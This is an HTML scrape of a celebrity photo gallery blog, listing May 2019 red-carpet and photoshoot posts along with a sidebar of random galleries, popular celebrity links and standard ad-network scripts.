Goulart at the Premiere of &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/izabel-goulart-at-the-premiere-of-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html"></fb:comments-count> Comment and 1,940 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/izabel-goulart-at-the-premiere-of-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html" class="thumbnail"><img width="683" height="1024" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Izabel-Goulart-at-the-Premiere-of-The-Dead-Dont-Die-6.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Izabel Goulart at the Premiere of &quot;The Dead Don&#039;t Die&quot; &amp; Opening Ceremony, 72nd Cannes Film Festival" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/izabel-goulart-at-the-premiere-of-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html#more-194329" class="more-link"><span aria-label="Continue reading Izabel Goulart at the Premiere of &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/izabel-goulart" rel="category tag">Izabel Goulart</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/72nd-cannes-film-festival" rel="tag">72nd Cannes Film Festival</a>, <a href="https://www.sawfirst.com/opening-ceremony" rel="tag">Opening Ceremony</a>, <a href="https://www.sawfirst.com/premiere" rel="tag">Premiere</a>, <a href="https://www.sawfirst.com/the-dead-dont-die" rel="tag">The Dead Don't Die</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/romee-strijd-at-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html" rel="bookmark" title="Permanent Link to Romee Strijd at &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival"> Romee Strijd at &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/romee-strijd-at-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html"></fb:comments-count> Comment and 1,952 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/romee-strijd-at-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html" class="thumbnail"><img width="1280" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Romee-Strijd-at-The-Dead-Dont-Die-Opening-Ceremony-18.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Romee Strijd at &quot;The Dead Don&#039;t Die&quot; &amp; Opening Ceremony, 72nd Cannes Film Festival" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/romee-strijd-at-the-dead-dont-die-opening-ceremony-72nd-cannes-film-festival-2019-05-15.html#more-194305" class="more-link"><span aria-label="Continue reading Romee Strijd at &#8220;The Dead Don&#8217;t Die&#8221; &#038; Opening Ceremony, 72nd Cannes Film Festival">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/romee-strijd" rel="category tag">Romee Strijd</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/72nd-cannes-film-festival" rel="tag">72nd Cannes Film Festival</a>, <a href="https://www.sawfirst.com/opening-ceremony" rel="tag">Opening Ceremony</a>, <a href="https://www.sawfirst.com/the-dead-dont-die" rel="tag">The Dead Don't Die</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/sarah-hyland-at-walt-disney-television-upfront-presentation-in-nyc-2019-05-15.html" rel="bookmark" title="Permanent Link to Sarah Hyland at Walt Disney Television Upfront Presentation in NYC"> Sarah Hyland at Walt Disney Television Upfront Presentation in NYC </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/sarah-hyland-at-walt-disney-television-upfront-presentation-in-nyc-2019-05-15.html"></fb:comments-count> Comment and 1,403 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/sarah-hyland-at-walt-disney-television-upfront-presentation-in-nyc-2019-05-15.html" class="thumbnail"><img width="1280" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Sarah-Hyland-at-Walt-Disney-Television-Upfront-Presentation-in-NYC-1.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Sarah Hyland at Walt Disney Television Upfront Presentation in NYC" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/sarah-hyland-at-walt-disney-television-upfront-presentation-in-nyc-2019-05-15.html#more-194296" class="more-link"><span aria-label="Continue reading Sarah Hyland at Walt Disney Television Upfront Presentation in NYC">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/sarah-hyland" rel="category tag">Sarah Hyland</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/nyc" rel="tag">NYC</a>, <a href="https://www.sawfirst.com/walt-disney-television-upfront-presentation" rel="tag">Walt Disney Television Upfront Presentation</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/shailene-woodley-for-who-what-wear-photoshoot-may-2019-2019-05-15.html" rel="bookmark" title="Permanent Link to Shailene Woodley for Who What Wear Photoshoot &#8211; May 2019"> Shailene Woodley for Who What Wear Photoshoot &#8211; May 2019 </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/shailene-woodley-for-who-what-wear-photoshoot-may-2019-2019-05-15.html"></fb:comments-count> Comment and 1,507 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/shailene-woodley-for-who-what-wear-photoshoot-may-2019-2019-05-15.html" class="thumbnail"><img width="2000" height="1432" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Shailene-Woodley-for-Who-What-Wear-Photoshoot-May-2019-6.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Shailene Woodley for Who What Wear Photoshoot - May 2019" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/shailene-woodley-for-who-what-wear-photoshoot-may-2019-2019-05-15.html#more-194287" class="more-link"><span aria-label="Continue reading Shailene Woodley for Who What Wear Photoshoot &#8211; May 2019">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/shailene-woodley" rel="category tag">Shailene Woodley</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/photoshoot" rel="tag">Photoshoot</a>, <a href="https://www.sawfirst.com/who-what-wear" rel="tag">Who What Wear</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> <div class="contentbox"> <h2><a href="https://www.sawfirst.com/emma-stone-at-louis-vuitton-cruise-2020-fashion-show-in-new-york-2019-05-15.html" rel="bookmark" title="Permanent Link to Emma Stone at Louis Vuitton Cruise 2020 Fashion Show in New York"> Emma Stone at Louis Vuitton Cruise 2020 Fashion Show in New York </a></h2> <div class="byline"> Posted on May. 15th, 2019 <!-- by --> <span class="author"> <!-- <a href="https://www.sawfirst.com/author/hunk" title="Posts by Saw First" rel="author">Saw First</a> --> <span class="right"><fb:comments-count href="https://www.sawfirst.com/emma-stone-at-louis-vuitton-cruise-2020-fashion-show-in-new-york-2019-05-15.html"></fb:comments-count> Comment and 2,100 views</span> </span> </div> <div class="entry"><div class="iimage"> <a href="https://www.sawfirst.com/emma-stone-at-louis-vuitton-cruise-2020-fashion-show-in-new-york-2019-05-15.html" class="thumbnail"><img width="1454" height="1920" src="https://www.sawfirst.com/wp-content/uploads/2019/05/Emma-Stone-506.jpg" class="attachment-full-width size-full-width wp-post-image" alt="Emma Stone at Louis Vuitton Cruise 2020 Fashion Show in New York" /></a> </div><!--end iimage--> <!-- <p> <a href="https://www.sawfirst.com/emma-stone-at-louis-vuitton-cruise-2020-fashion-show-in-new-york-2019-05-15.html#more-194273" class="more-link"><span aria-label="Continue reading Emma Stone at Louis Vuitton Cruise 2020 Fashion Show in New York">(more&hellip;)</span></a></p> --> <div class="clear"></div> <div class="entryfooter"></div> <!-- end entryfooter --> <div class="meta"><span> filed under: <a href="https://www.sawfirst.com/emma-stone" rel="category tag">Emma Stone</a> </span><span class="tags"> Tagged with: <a href="https://www.sawfirst.com/dog" rel="tag">Dog</a>, <a href="https://www.sawfirst.com/fashion-show" rel="tag">Fashion Show</a>, <a href="https://www.sawfirst.com/louis-vuitton-cruise" rel="tag">Louis Vuitton Cruise</a>, <a href="https://www.sawfirst.com/new-york" rel="tag">New York</a> </span> </div> </div> <!--end: entry--> </div> <!--end: contentbox--> </pre><div class="wp-pagenavi"><span class="pages">Page 1 of 1021</span><span aria-current='page' class='page-numbers current'>1</span><a class='page-numbers' href='https://www.sawfirst.com/page/2'>2</a><a class='page-numbers' href='https://www.sawfirst.com/page/3'>3</a><a class='page-numbers' href='https://www.sawfirst.com/page/4'>4</a><span class="page-numbers dots">&hellip;</span><a class='page-numbers' href='https://www.sawfirst.com/page/1021'>1,021</a><a class="next page-numbers" href="https://www.sawfirst.com/page/2">»</a></div><pre> </div><!--end: content--></div><!--end: col1--><div id="sidebar"> <div id="sidebarbox"><!-- <div align="center"><h3><a rel="nofollow" href="http://www.pokingeye.com" target="_blank"><i>Celebrity Fashion Gallery</i></a></h3></div><br /> --> <div class="ad300x250"><div id="taboola-right-rail-article-thumbnails"></div><script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-rr', container: 'taboola-right-rail-article-thumbnails', placement: 'Right Rail Article Thumbnails', target_type: 'mix' });</script> </div> <!--end: ad300x250--> <div class="widget"> <h3> <a rel="nofollow" href="http://feeds.feedburner.com/sawfirst" title="FEEDBURNER" target="_blank">SUBSCRIBE</a> - <a rel="nofollow" href="https://www.facebook.com/sawfirstblog/" title="FACEBOOK" target="_blank">FACEBOOK</a> - <a rel="nofollow" href="https://twitter.com/SawFirst1" title="TWITTER" target="_blank">TWITTER</a> </h3> <div class="box"> <div class="right"><img src="https://www.sawfirst.com/wp-content/themes/Fashionpress/images/feed.gif" width="32px" height="32px" alt="feed"/></div> You can subscribe by e-mail to receive the latest news and breaking stories. <form id="subscribeform" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=sawfirst', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"> <div id="subscribe"> <input class="subscribeinput" value="Enter your email..." onclick="this.value='';" name="feed" id="input" /> <input type="hidden" value="sawfirst" name="uri"/> <input type="hidden" name="loc" value="en_US"/> <input type="submit" class="subscribesubmit" value="Sign up"/> </div> </form> </div><!--end: box--> </div><!--end: widget--> <div class="widget"> <div class="textwidget"></div> </div> </div> <!--end: widget--><div class="leftwidget"> <h3> RANDOM GALLERIES </h3> <div class="box"> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/naya-rivera-at-2013-elles-women-in-hollywood-2013-10-22.html" rel="bookmark" title="Naya Rivera at 2013 ELLE’s Women in Hollywood"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/10/Naya-Rivera-ELLEs-20th-Annual-Women-in-Hollywood-8-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Naya-Rivera-ELLEs-20th-Annual-Women-in-Hollywood-8" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/lisa-opie-in-bikini-in-miami-2-2014-05-02.html" rel="bookmark" title="Lisa Opie in Bikini in Miami"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/05/Lisa-Opie-15-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Lisa-Opie-15" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/ashley-judd-at-womens-march-on-washington-in-washington-2017-01-22.html" rel="bookmark" title="Ashley Judd at Women&#8217;s March on Washington in Washington"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2017/01/Ashley-Judd-at-Womens-March-on-Washington-in-Washington-8-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Ashley-Judd-at-Women&#039;s-March-on-Washington-in-Washington-8" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/sylvie-meis-in-hunkemoeller-lingerie-photoshoot-2015-10-29.html" rel="bookmark" title="Sylvie Meis in “Hunkemoeller” Lingerie Photoshoot"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2015/10/Sylvie-Meis-in-Hunkemoeller-Lingerie-Photoshoot-20-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Sylvie-Meis-in-Hunkemoeller-Lingerie-Photoshoot-20" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/antonella-roccuzzo-out-and-about-in-jeans-2015-03-07.html" rel="bookmark" title="Antonella Roccuzzo Out and About in Jeans"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2015/03/Antonella-Roccuzzo-in-Jeans-6-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Antonella-Roccuzzo-in-Jeans-6" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/debby-ryan-candids-from-lax-airport-march-2014-2014-04-03.html" rel="bookmark" title="Debby Ryan Candids From LAX Airport – March 2014"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/04/Debby-Ryan-2-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Debby-Ryan-2" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/alexandra-daddario-at-decades-of-glamour-event-in-west-hollywood-2014-02-26.html" rel="bookmark" title="Alexandra Daddario at Decades of Glamour Event in West Hollywood"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/02/Alexandra-Daddario-at-Decades-of-Glamour-Event-in-West-Hollywood-4-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Alexandra-Daddario-at-Decades-of-Glamour-Event-in-West-Hollywood-4" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/lady-gaga-on-joanne-world-tour-at-rogers-arena-in-vancouver-canada-2017-08-02.html" rel="bookmark" title="Lady Gaga on ‘Joanne World Tour’ at Rogers Arena in Vancouver, Canada"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2017/08/Lady-Gaga-on-Joanne-World-Tour-22-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Lady Gaga on ‘Joanne World Tour’ at Rogers Arena in Vancouver, Canada" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/christina-milian-at-french-montana-2014-pre-grammy-party-in-la-2014-01-25.html" rel="bookmark" title="Christina Milian at French Montana 2014 Pre-Grammy Party in LA"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/01/Christina-Milian-643-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Christina-Milian-643" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/alessandra-ambrosio-bikini-candids-in-miami-2013-12-08.html" rel="bookmark" title="Alessandra Ambrosio Bikini Candids in Miami"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/12/Alessandra-Ambrosio-4-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Alessandra-Ambrosio-4" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/eiza-gonzalez-out-shopping-in-west-hollywood-2014-08-31.html" rel="bookmark" title="Eiza Gonzalez Out Shopping in West Hollywood"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/08/Eiza-Gonzalez-923-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Eiza-Gonzalez-923" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/sara-sampaio-in-vogue-turkey-magazine-june-2017-2017-06-08.html" rel="bookmark" title="Sara Sampaio in Vogue Turkey Magazine &#8211; June 2017"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2017/06/Sara-Sampaio-in-Vogue-Turkey-2017-10-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Sara Sampaio in Vogue Turkey Magazine - June 2017" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/chloe-moretz-at-the-41st-annual-peoples-choice-awards-in-la-2015-01-08.html" rel="bookmark" title="Chloe Moretz at The 41st Annual People&#8217;s Choice Awards in LA"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2015/01/Chloe-Moretz-102-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Chloe-Moretz-102" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/selena-gomez-performing-live-in-sunrise-2013-10-30.html" rel="bookmark" title="Selena Gomez Performing Live in Sunrise"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/10/Selena-Gomez-701-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Selena-Gomez-701" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/juliana-proven-bikini-photoshoot-in-miami-2016-06-21.html" rel="bookmark" title="Juliana Proven Bikini Photoshoot in Miami"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2016/06/Juliana-Proven-622-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Juliana-Proven-622" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/nina-dobrev-in-red-tights-walking-dog-maverick-in-la-2017-10-16.html" rel="bookmark" title="Nina Dobrev in Red Tights walking Dog Maverick in LA"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2017/10/Nina-Dobrev-in-Red-Tights-502-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Nina Dobrev in Red Tights walking Dog Maverick in LA" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/rita-ora-candids-in-new-york-2016-08-04.html" rel="bookmark" title="Rita Ora Candids in New York"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2016/08/Rita-Ora-Candids-in-NY-9-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Rita-Ora-Candids-in-NY-9" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/emilia-clarke-at-gq-men-of-the-year-awards-in-london-2015-09-08.html" rel="bookmark" title="Emilia Clarke at GQ Men Of The Year Awards in London"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2015/09/Emilia-Clarke-at-GQ-Men-Of-The-Year-Awards-2015-2-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Emilia-Clarke-at-GQ-Men-Of-The-Year-Awards-2015-2" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/maitland-ward-bikini-photoshoot-candids-in-marina-del-rey-2015-10-23.html" rel="bookmark" title="Maitland Ward Bikini Photoshoot Candids in Marina Del Rey"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2015/10/Maitland-Ward-Bikini-Photoshoot-Marina-Del-Rey-602-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Maitland-Ward-Bikini-Photoshoot-Marina-Del-Rey-602" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/selena-gomez-in-parisien-photoshoot-2013-2013-05-29.html" rel="bookmark" title="Selena Gomez in Parisien Photoshoot 2013"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/05/Selena-Gomez-Parisien-Photoshoot-2013-1-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Selena-Gomez-Parisien-Photoshoot-2013-1" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/maria-menounos-at-star-trek-into-darkness-premiere-in-hollywood-2013-05-16.html" rel="bookmark" title="Maria Menounos at “Star Trek: Into Darkness” Premiere in Hollywood"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/05/Maria-Menounos-Star-Trek-Into-Darkness-Premiere-13-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Maria-Menounos-Star-Trek-Into-Darkness- Premiere-13" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/gemma-atkinson-in-swimsuit-in-cape-verde-2016-11-19.html" rel="bookmark" title="Gemma Atkinson in Swimsuit in Cape Verde"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2016/11/Gemma-Atkinson-in-Swimsuit-356-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="gemma-atkinson-in-swimsuit-356" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/maitland-ward-in-yellow-bikini-in-marina-del-rey-2014-08-04.html" rel="bookmark" title="Maitland Ward in Yellow Bikini in Marina Del Rey"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/08/Maitland-Ward-1-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Maitland-Ward-1" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/angela-simmons-in-bikini-on-beach-at-her-26th-birthday-on-18-september-2013-09-21.html" rel="bookmark" title="Angela Simmons in Bikini on Beach at her 26th Birthday on 18 September"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/09/Angela-Simmons-1-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="**EXCLUSIVE** Angela Simmons starts off her birthday celebrations early, showing off her bikini body for a day out on Miami beach" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/debby-ryan-for-naked-magazine-april-2013-issue-2013-04-01.html" rel="bookmark" title="Debby Ryan Photoshoot for Naked Magazine – April 2013 issue"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/04/Debby-Ryan-in-Naked-Magazine-April-2013-51-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Debby-Ryan-in-Naked-Magazine---April-2013-5" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/kylie-jenner-goes-to-andy-lecompte-salon-in-los-angeles-2014-02-01.html" rel="bookmark" title="Kylie Jenner goes to Andy LeCompte Salon in Los Angeles"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/02/Kylie-Jenner-6-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Kylie Jenner goes to Andy LeCompte Salon in Los Angeles" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/amy-pejkovic-in-bikini-on-the-harbourside-in-sydney-2019-01-03.html" rel="bookmark" title="Amy Pejkovic in Bikini on the Harbourside in Sydney"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2019/01/Amy-Pejkovic-in-Bikini-16-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Amy Pejkovic on the Harbourside in Sydney" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/debby-ryan-leggy-leaving-the-chateau-marmont-in-west-hollywood-2013-04-28.html" rel="bookmark" title="Debby Ryan Leggy, leaving the Chateau Marmont in West Hollywood"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/04/Debby_Ryan_leggy_leaving_Chateau_Marmont_West_Hollywood_1-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Debby_Ryan_leggy_leaving_Chateau_Marmont_West_Hollywood_1" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/alison-brie-on-the-set-of-sleeping-with-other-people-in-nyc-2014-07-09.html" rel="bookmark" title="Alison Brie on the Set of &#8216;Sleeping With Other People&#8217; in NYC"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2014/07/Alison-Brie-128-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Alison-Brie-128" /></a></div> <div class="attachment-thumbnail2"><a href="https://www.sawfirst.com/lady-gaga-in-clamshell-bikini-top-and-miniskirt-on-bravo-show-2013-09-15.html" rel="bookmark" title="Lady Gaga in Clamshell Bikini Top and Miniskirt on Bravo Show"><img width="130" height="170" src="https://www.sawfirst.com/wp-content/uploads/2013/09/Lady-Gaga-in-Clamshell-Bikini-Top-and-Miniskirt-on-Bravo-Show-5-130x170.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Lady-Gaga-in-Clamshell-Bikini-Top-and-Miniskirt-on-Bravo-Show-5" /></a></div> </div><!--end box--><!-- Front Page Sidebar Middle --><!-- BEGIN TECHNORATI MEDIA TAG --><!-- Begin js tags AdTrue for sawfirst.com_300x250 - Do not Modify --><div id="adtrue_tag_10884"></div><script data-cfasync='false' type='text/javascript' src='//cdn.adtrue.com/rtb/async.js' async></script><script type="text/javascript"> var adtrue_tags = window.adtrue_tags || []; adtrue_tags.push({ tag_id: 10884, width: 300, height: 250, });</script><!-- End Tags --> <!-- END TECHNORATI MEDIA TAG --><br /><!-- BEGIN TECHNORATI MEDIA TAG --><!-- Begin js tags AdTrue for sawfirst.com_300x250_mobile - Do not Modify --><div id="adtrue_tag_10886"></div><script data-cfasync='false' type='text/javascript' src='//cdn.adtrue.com/rtb/async.js' async></script><script type="text/javascript"> var adtrue_tags = window.adtrue_tags || []; adtrue_tags.push({ tag_id: 10886, width: 300, height: 250, });</script><!-- End Tags --><!-- END TECHNORATI MEDIA TAG --><br /><!-- MGID Composite Start --><!-- Composite End --> </div><!--end: left widget--> <div class="rightwidget"> <!-- Sidebar Middle --><!-- BEGIN TECHNORATI MEDIA TAG --> <h3> POPULAR CELEBS AT SAWFIRST </h3> <div class="box"><ul> <li class="cat-item cat-item-1"><a href="https://www.sawfirst.com/selena-gomez">Selena Gomez</a></li> <li class="cat-item cat-item-254"><a href="https://www.sawfirst.com/kendall-jenner">Kendall Jenner</a></li> <li class="cat-item cat-item-87"><a href="https://www.sawfirst.com/miley-cyrus">Miley Cyrus</a></li> <li class="cat-item cat-item-563"><a href="https://www.sawfirst.com/ariel-winter">Ariel Winter</a></li> <li class="cat-item cat-item-250"><a href="https://www.sawfirst.com/kim-kardashian">Kim Kardashian</a></li> <li class="cat-item cat-item-4682"><a href="https://www.sawfirst.com/kylie-jenner">Kylie Jenner</a></li> <li class="cat-item cat-item-1630"><a href="https://www.sawfirst.com/rita-ora">Rita Ora</a></li> <li class="cat-item cat-item-33"><a href="https://www.sawfirst.com/vanessa-hudgens">Vanessa Hudgens</a></li> <li class="cat-item cat-item-375"><a href="https://www.sawfirst.com/candice-swanepoel">Candice Swanepoel</a></li> <li class="cat-item cat-item-408"><a href="https://www.sawfirst.com/alessandra-ambrosio">Alessandra Ambrosio</a></li> <li class="cat-item cat-item-585"><a href="https://www.sawfirst.com/jennifer-lopez">Jennifer Lopez</a></li> <li class="cat-item cat-item-2245"><a href="https://www.sawfirst.com/emily-ratajkowski">Emily Ratajkowski</a></li> <li class="cat-item cat-item-1757"><a href="https://www.sawfirst.com/kimberley-garner">Kimberley Garner</a></li> <li class="cat-item cat-item-29"><a href="https://www.sawfirst.com/rihanna">Rihanna</a></li> <li class="cat-item cat-item-421"><a href="https://www.sawfirst.com/claudia-romani">Claudia Romani</a></li> <li class="cat-item cat-item-655"><a href="https://www.sawfirst.com/bella-thorne">Bella Thorne</a></li> <li class="cat-item cat-item-248"><a href="https://www.sawfirst.com/hilary-duff">Hilary Duff</a></li> <li class="cat-item cat-item-36"><a href="https://www.sawfirst.com/kelly-brook">Kelly Brook</a></li> <li class="cat-item cat-item-273"><a href="https://www.sawfirst.com/nina-agdal">Nina Agdal</a></li> <li class="cat-item cat-item-2509"><a href="https://www.sawfirst.com/gigi-hadid">Gigi Hadid</a></li></ul><a href="https://www.sawfirst.com/celebrities"><strong>BROWSE LIST <i>of</i> CELEBRITIES</strong></a></div> </div><!-- Begin Adversal 300x600 - sawfirst.com Code --><!-- Begin js tags AdTrue for sawfirst.com_300x600 - Do not Modify --><div id="adtrue_tag_10885"></div><script data-cfasync='false' type='text/javascript' src='//cdn.adtrue.com/rtb/async.js' async></script><script type="text/javascript"> var adtrue_tags = window.adtrue_tags || []; adtrue_tags.push({ tag_id: 10885, width: 300, height: 600, });</script><!-- End Tags --><!-- End Adversal 300x600 - sawfirst.com Code --> <div class="clear"></div> <!--end: 